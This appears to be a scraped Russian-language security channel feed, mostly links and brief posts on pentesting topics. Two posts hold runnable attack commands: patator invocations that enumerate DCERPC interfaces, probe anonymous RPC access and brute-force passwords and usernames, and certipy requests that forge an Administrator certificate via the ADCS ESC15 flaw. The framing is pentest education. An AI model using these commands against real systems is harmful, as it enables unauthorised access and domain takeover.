Fsecurity | HH

🔗Ссылка: https://spy-soft.net/dpapi-data-decryption-active-directory-hekatomb/

🔗Ссылка: https://habr.com/ru/companies/bastion/articles/849370/

🔗Ссылка: https://www.anti-malware.ru/news/2024-10-09-114534/44353

Добрый день, уважаемые подписчики! В сегодняшней статье мы с Вами рассмотрим уязвимость time-based blind SQL injection в плагине Business Directory Plugin (CVE-2024-4443) с оценкой в 9.8 баллов по шкале CVSS. Данная уязвимость предоставляет злоумышленникам возможность извлечения конфиденциальной информации из базы данных с помощью тайминговых атак. https://teletype.in/@giscyberteam/wordpress_business_directory_plugin_cve_2024_4443 #WordPress #SQLi #BusinessDirectory

⚡️ GOAD — одна из самых актуальных и самодостаточных тестовых инстурментов для пентеста окружения на базе Active Directory. Главная цель — предоставить пентестерам уязвимую среду Active Directory, готовую к использованию для отработки основных атак, включая: • Password reuse between computer (PTH) • Spray User = Password • Password in description • SMB share anonymous • SMB not signed • Responder • Zerologon • Windows defender • ASREPRoast • Kerberoasting • AD Acl abuse • Unconstraint delegation • Ntlm relay • Constrained delegation • Install MSSQL • MSSQL trusted link • MSSQL impersonate • Install IIS • Upload asp app • Multiples forest • Anonymous RPC user listing • Child parent domain • Generate certificate and enable ldaps • ADCS - ESC 1/2/3/4/6/8 • Certifry • Samaccountname/nopac • Petitpotam unauthent • Printerbug • Drop the mic • Shadow credentials • Mitm6 • Add LAPS • GPO abuse • Add Webdav • Add RDP bot • Add full proxmox integration • Add Gmsa и многие другие 🔗 Ссылка на GitHub

🔗Ссылка: https://habr.com/ru/companies/clevertec/articles/849102/

🔗Ссылка: https://www.anti-malware.ru/news/2024-10-10-111332/44357

🔗Ссылка: https://spy-soft.net/rce-vulnerability-via-file-upload/

🔐 Поисковые системы для пентестеров! @linuxkalii

🔗Ссылка: https://habr.com/ru/companies/ruvds/articles/849340/

🔗Ссылка: https://xakep.ru/2024/10/09/goldenjackal-air-gapped-systems/

🔗Ссылка: https://habr.com/ru/companies/lanit/articles/847906/

Почти всегда при пентесте внешнего периметра можно встретить FTP-сервер. Протокол FTP имеет особенность - данные он передает через другой порт, как правило случайный. И для хакера от сюда следует две вещи. Тк FTP для данных открывает случайный порт из верхнего динамического диапазона, то часто c DMZ пробрасывают почти весь динамический диапазон портов. Куда входит и DCERPC (49152,..). Всё что доступно через MSRPC пайпы на 99% доступно и через DCERPC-транспорт. А это значит, что на этих портах можно найти и OpenSCManagerW (services.py, smbexec.py, psexec.py), и SchRpcRegisterTask/SchRpcRun/SchRpcGetLastRunInfo (atexec.py) интерфейсы и подбирать к ним пароль. В случае успеха - RCE и захват сервера, в случае неудачи - DCERPC как минимум в своём negotiation разглашает имя домена и машины. Специально для этого я сделал pull request в patator и теперь с помощью него можно раскручивать DCERPC. Утилиты ifmap.py, rpcmap.py и auxiliary/scanner/dcerpc/management иногда могут возвращать rpc_s_access_denied, но это не предел, и тут мы можем применить patator.py: patator.py dcom_login host=10.0.0.15 port=49152 uuid=FILE0 0=/tmp/uuids.txt ver=FILE1 1=/tmp/vers.txt -t 1 -x ignore:code=-1 - получаем список UUID без аутентификации. Можем сразу посмотреть, на каком порту висит "перспективный" интерфейс: patator.py dcom_login host=10.0.0.15 port=FILE0 0=/tmp/ports.txt uuid=367abb81-9844-35f1-ad32-98f038001003 ver=2.0 -t 1 -x ignore:code=-1 - где MS-SCMR (smbexec.py) patator.py dcom_login host=10.0.0.15 port=FILE0 0=/tmp/ports.txt uuid=86d35949-83c9-4044-b424-db363231fd0c ver=1.0 -t 1 -x ignore:code=-1 - где MS-TSCH (atexec.py) patator.py dcom_login host=10.0.0.15 port=FILE0 0=/tmp/ports.txt uuid=12345678-1234-abcd-ef00-0123456789ab ver=1.0 -t 1 -x ignore:code=-1 - где MS-RPRN (printerbug) patator.py dcom_login host=10.0.0.15 port=FILE0 0=/tmp/ports.txt uuid=c681d488-d850-11d0-8c52-00c04fd90f7e ver=1.0 -t 1 -x ignore:code=-1 - где MS-EFSR (petitpotam) и т.д. В отличие от MSRPC, DCERPC как транспорт сам по себе не требует аутентификации и недоступные по MSRPC функции могут быть доступны по DCERPC. Поэтому на каждом порту и каждом интерфейсе можно проверить наличие анонимного доступа к каждой RPC-функции вызывая её opnum по-очереди: patator.py dcom_login host=10.0.0.15 port=49158 uuid=12345778-1234-ABCD-EF00-0123456789AB ver=0.0 opnum=FILE0 0=/tmp/opnums.txt -t 1 -x ignore:mesg=rpc_s_access_denied - везде где вернулся rpc_x_bad_stub_data или success означает возможность вызвать RPC анонимно Пример анонимного вызова IObjectExporter::ServerAlive2(), той самой что возвращает список сетевых интерфейсов: patator.py dcom_login host=10.0.0.15 port=135 uuid=99fcfec4-5260-101b-bbcb-00aa0021347a ver=0.0 opnum=5 И наконец сам брутфорс мы можем делать на любом интерфейсе, любом tcp-порту: patator dcom_login host=1.2.3.4 port=49665 uuid=000001A0-0000-0000-C000-000000000046 ver=0.0 user=admin password=FILE0 0=passwords.txt -x quit:mesg=rpc_x_bad_stub_data И еще. Иногда было замечено, что на DCERPC при аутентификации можно получать разные коды ошибок для существующих и не существующих пользователей. Тоже самое будет справедливо и для доменных учётных записей. patator dcom_login host=1.2.3.4 port=49665 uuid=000001A0-0000-0000-C000-000000000046 ver=0.0 user=FILE0 password=1 0=logins.txt -x ignore:mesg='Unknown DCE RPC fault status code: 00000721' Возможность user enumeration ещё сильнее упростит проведение bruteforce атаки. Вот столько всего можно выжать из безобидно торчащего 49152/tcp порта...

🔗Ссылка: https://www.anti-malware.ru/news/2024-10-09-111332/44347

🔗Ссылка: https://habr.com/ru/companies/ruvds/articles/837580/

🔗Ссылка: https://xakep.ru/2024/10/08/fake-lego-coin/

🔗Ссылка: https://spy-soft.net/kali-linux-pi-tail-raspberry-pi-zero/

🔗Ссылка: https://xakep.ru/2024/10/08/perfctl/

🔗Ссылка: https://www.anti-malware.ru/news/2024-10-08-111332/44335

В certipy завезли новый вектор атаки #ESC15 на центр сертификации ADCS, которая использует специфические настройки шаблонов сертификатов, которые соответствуют большинству первичных условий атаки ESC1 или на ESC3, а именно: 1. Низкие привилегии для пользователей при регистрации: Шаблон позволяет пользователям с низкими привилегиями регистрировать сертификаты. 2. Возможность указания произвольного Subject Alternative Name (SAN): Пользователь может задавать произвольные SAN, что может быть использовано для маскировки или других целей. 3. Использование Schema Version 1: Шаблон использует устаревшую версию схемы, которая может содержать дополнительные уязвимости. Однако, в отличие от ESC1, шаблон не включает расширение ‘Client Authentication’ (EKU). Это создает дополнительные возможности для злоумышленников. Примеры: 1. Запрос сертификата с указанием ‘Client Authentication’ EKU:

certipy req -ca CORP-DC-CA -target-ip 192.168.4.178 -u 'user@corp.com' -p 'Password1' -template "WebServer" -upn "Administrator@corp.com" --application-policies 'Client Authentication'

2. Запрос сертификата с указанием OID для ‘Client Authentication’:

certipy req -ca CORP-DC-CA -target-ip 192.168.4.178 -u 'user@corp.com' -p 'Password1' -template "WebServer" -upn "Administrator@corp.com" --application-policies '1.3.6.1.5.5.7.3.2'

-> В ESC3 основной вектор атаки связан с тем, что у злоумышленника есть доступ к шаблону, который уже содержит необходимый EKU (Client Authentication), и злоумышленник использует его для подделки учетных данных. -> В ESC15 злоумышленник может не иметь нужных EKU в шаблоне, но использует возможность добавления произвольных Application Policies, включая EKU, что делает этот шаблон уязвимым. https://github.com/ly4k/Certipy/pull/228/commits/b9e87bbf09345d1364b6ff5108130bf9ee80fa47